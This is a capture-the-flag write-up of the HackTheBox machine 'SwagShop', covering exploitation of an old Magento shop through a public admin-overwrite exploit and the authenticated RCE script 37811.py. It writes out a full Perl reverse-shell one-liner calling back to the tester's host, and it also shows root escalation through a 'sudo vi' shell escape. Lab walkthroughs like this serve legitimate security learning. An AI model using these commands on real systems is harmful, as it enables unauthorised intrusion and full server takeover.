Post

SwagShop @ HackTheBox

SwagShop @ HackTheBox

SwagShop is a very easy machine on hackthebox, involving a public exploit and sudo abuse.

User Flag

We start with a quick port scan:

1
2
3
4
5
6
7
8
9
10
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Did not follow redirect to http://10.10.10.140/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

On port 80 we see an installation of a magento shop:

The footer reveals its from 2014 so there might be some exploits available. We can see at this page that the most recent version in 2014 was 1.9.x so we focus on that one for now. We run searchsploit magento and notice an exploit specifically targeting 1.9.0.1:

1
2
3
...
Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution      | exploits/php/webapps/37811.py
...

We look through the source to do our due diligence and see that we have to set some variables for it to work:

1
2
3
4
username = ''
password = ''
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Wed, 08 May 2019 07:23:09 +0000'  # This needs to be the exact date from /app/etc/local.xml

For the username/password bit it wants admin credentials which we do not have at this point. We find another exploit that allows us to potentially overwrite the admin credentials! After changing the url in the script we run it and it successfully changes the admin credentials for us:

1
2
WORKED
Check http://10.10.10.140/admin with creds forme:forme

We can now use the first exploit! Besides entering the admin credentials, we also have to retrieve the file “/app/etc/local.xml” via curl and enter the installation date into the script (like it says in the comment):

1
2
3
4
username = 'forme'
password = 'forme'
php_function = 'system'  # Note: we can only pass 1 argument to the function
install_date = 'Sat, 15 Nov 2014 20:27:57 +0000'  # This needs to be the exact date from /app/etc/local.xml

We run the script python 37811.py http://swagshop.htb 'whoami' but notice that it doesn’t quite work yet:

1
2
 raise ControlNotFoundError("no control matching "+description)
mechanize._form.ControlNotFoundError: no control matching name 'login[password]'

It looks like the endpoint is wrong. Some googling reveals we have to call it like this:

1
python 37811.py http://swagshop.htb/index.php/admin/index 'whoami'

We use the RCE and replace ‘whoami’ with a perl shell:

1
perl -e 'use Socket;$i="10.10.16.66";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
1
2
3
4
5
6
connect to [10.10.16.66] from swagshop.htb [10.10.10.140] 41344
$ whoami
www-data
$ cd /home/haris
$ wc -lc user.txt
 1 33 user.txt

The “37811.py” exploit is kind of unreliable – an alternative way to get RCE, is to upload a malicious package to http://swagshop.htb/downloader. After uploading we send a Post-Request to “/index.php/lavalamp/index”, with the parameter “c” containing our shell command.

Root Flag

Root was very easy on this box. We run sudo -l and see the following:

1
2
3
4
5
6
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

This means we can get a root shell without any effort:

1
2
3
4
5
6
sudo /usr/bin/vi /var/www/html/xct
:!/bin/bash
whoami
root
wc -lc /root/root.txt
 10 270 /root/root.txt

Thanks to ch4p for creating the box.

This post is licensed under CC BY 4.0 by the author.